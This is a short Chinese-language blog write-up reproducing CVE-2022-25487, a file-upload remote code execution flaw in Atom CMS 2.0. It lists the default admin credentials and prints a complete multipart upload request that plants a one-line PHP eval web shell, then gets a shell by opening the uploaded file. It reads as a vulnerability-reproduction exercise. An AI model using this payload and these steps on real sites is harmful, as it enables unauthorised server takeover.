CVE-2022-25487漏洞复现
- 游戏开发
- 2025-07-21 18:08:21

漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。
其实这就是一个文件上传漏洞罢了。。。。
打开之后,/home路由是个空白
信息搜集:该cms有默认邮箱/密码 alan@alan /password,到/admin路由下尝试登录。
Users下有个上传文件功能,可能是上传头像用的。
抓包中无文件上传的内容????(奇奇怪怪)
看了一下,漏洞路由在/admin/uploads.php,直接在界面中点击到不了这个路由。。。。
直接修改刚刚的包吧
直接传php文件,这cms写的真shit
Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041 -----------------------------30623082103363803402542706041 Content-Disposition: form-data; name="file" -----------------------------30623082103363803402542706041 Content-Disposition: form-data; name="file"; filename="cmd.php" Content-Type: image/jpeg <?php @eval($_POST['cmd']);?> -----------------------------30623082103363803402542706041--访问木马存储路由/uploads/1707520195231.phpgetshell
CVE-2022-25487漏洞复现由讯客互联游戏开发栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“CVE-2022-25487漏洞复现”
上一篇
C#Avalonia折线图